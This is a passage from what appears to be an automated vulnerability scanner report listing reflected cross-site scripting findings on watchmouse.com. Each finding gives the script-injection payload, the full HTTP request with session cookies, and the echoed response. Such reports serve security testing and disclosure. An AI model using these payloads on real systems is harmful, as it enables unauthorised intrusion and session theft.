The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e467"><script>alert(1)</script>b4d7b522153 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/non_profit_offering.php4e467"><script>alert(1)</script>b4d7b522153 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-96278a0a0e18cdf9a7c68c60ef6545ab"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/non_profit_offering.php4e467"><script>alert(1)</script>b4d7b522153" method="post">
...[SNIP]...

1.185. http://www.watchmouse.com/en/non_profit_offering.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/non_profit_offering.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f8a"><script>alert(1)</script>c74a747cb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/non_profit_offering.php?89f8a"><script>alert(1)</script>c74a747cb5=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-bdc8a9c092288881895e9b1725c491d5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/non_profit_offering.php?89f8a"><script>alert(1)</script>c74a747cb5=1" method="post">
...[SNIP]...

1.186. http://www.watchmouse.com/en/our_promise.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/our_promise.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a38c0"><script>alert(1)</script>5e615693d87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ena38c0"><script>alert(1)</script>5e615693d87/our_promise.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-00da540cc403e3901ab5a98adb3587f8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ena38c0"><script>alert(1)</script>5e615693d87/our_promise.php" method="post">
...[SNIP]...

1.187. http://www.watchmouse.com/en/our_promise.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/our_promise.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4051e"><script>alert(1)</script>484adfeedff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/our_promise.php4051e"><script>alert(1)</script>484adfeedff HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-63b5000df0544834477c83d41b1c1fa8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/our_promise.php4051e"><script>alert(1)</script>484adfeedff" method="post">
...[SNIP]...

1.188. http://www.watchmouse.com/en/our_promise.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/our_promise.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36641"><script>alert(1)</script>cc9a59dcd9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/our_promise.php?36641"><script>alert(1)</script>cc9a59dcd9e=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-1e3c0bfb1f28cafcffcdadf0225fe588"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/our_promise.php?36641"><script>alert(1)</script>cc9a59dcd9e=1" method="post">
...[SNIP]...

1.189. http://www.watchmouse.com/en/passwd.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/passwd.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84acb"><script>alert(1)</script>2f2d6b3cdb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en84acb"><script>alert(1)</script>2f2d6b3cdb6/passwd.php?mlang=en HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.13.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f620eef0153b9c80bda770b6a3163076"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en84acb"><script>alert(1)</script>2f2d6b3cdb6/passwd.php?mlang=en" method="post">
...[SNIP]...

1.190. http://www.watchmouse.com/en/passwd.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/passwd.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e567f"><script>alert(1)</script>1d6e35d6ae8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/passwd.phpe567f"><script>alert(1)</script>1d6e35d6ae8?mlang=en HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.13.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-8d8ca59c7587a7e0ea69593bff710c61"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/passwd.phpe567f"><script>alert(1)</script>1d6e35d6ae8?mlang=en" method="post">
...[SNIP]...

1.191. http://www.watchmouse.com/en/ping.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/ping.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acd89"><script>alert(1)</script>70bd0208e1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enacd89"><script>alert(1)</script>70bd0208e1d/ping.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d0742f5ada7518ecc189a46a864fc8d9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enacd89"><script>alert(1)</script>70bd0208e1d/ping.php" method="post">
...[SNIP]...

1.192. http://www.watchmouse.com/en/ping.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/ping.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f631d"><script>alert(1)</script>aac2f1df69f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/ping.phpf631d"><script>alert(1)</script>aac2f1df69f HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e84a932fa92b56c1ee50bc0c13e42517"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ping.phpf631d"><script>alert(1)</script>aac2f1df69f" method="post">
...[SNIP]...

1.193. http://www.watchmouse.com/en/ping.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/ping.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47f4e"><script>alert(1)</script>52c0b0a610f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/ping.php?47f4e"><script>alert(1)</script>52c0b0a610f=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b9845305c64c7fb7439150eb4e5227bf"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ping.php?47f4e"><script>alert(1)</script>52c0b0a610f=1" method="post">
...[SNIP]...

1.194. http://www.watchmouse.com/en/plans_price.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/plans_price.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18c5"><script>alert(1)</script>056e37b8466 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb18c5"><script>alert(1)</script>056e37b8466/plans_price.php HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e36c617bad6f75d9f867d96c4fdf941a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb18c5"><script>alert(1)</script>056e37b8466/plans_price.php" method="post">
...[SNIP]...

1.195. http://www.watchmouse.com/en/plans_price.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/plans_price.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd20d"><script>alert(1)</script>9b1a4de0c5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/plans_price.phpfd20d"><script>alert(1)</script>9b1a4de0c5f HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:31 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-572e1b99c6b409ad046af4796587dff1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/plans_price.phpfd20d"><script>alert(1)</script>9b1a4de0c5f" method="post">
...[SNIP]...

1.196. http://www.watchmouse.com/en/plans_price.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/plans_price.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d899"><script>alert(1)</script>87dab0eebd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/plans_price.php?6d899"><script>alert(1)</script>87dab0eebd5=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 11:59:27 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-5b19fcea6f723e9bf2d075d7b46c3eda"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 55109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/plans_price.php?6d899"><script>alert(1)</script>87dab0eebd5=1" method="post">
...[SNIP]...

1.197. http://www.watchmouse.com/en/press.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/press.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1bb5"><script>alert(1)</script>a6b74324670 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb1bb5"><script>alert(1)</script>a6b74324670/press.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
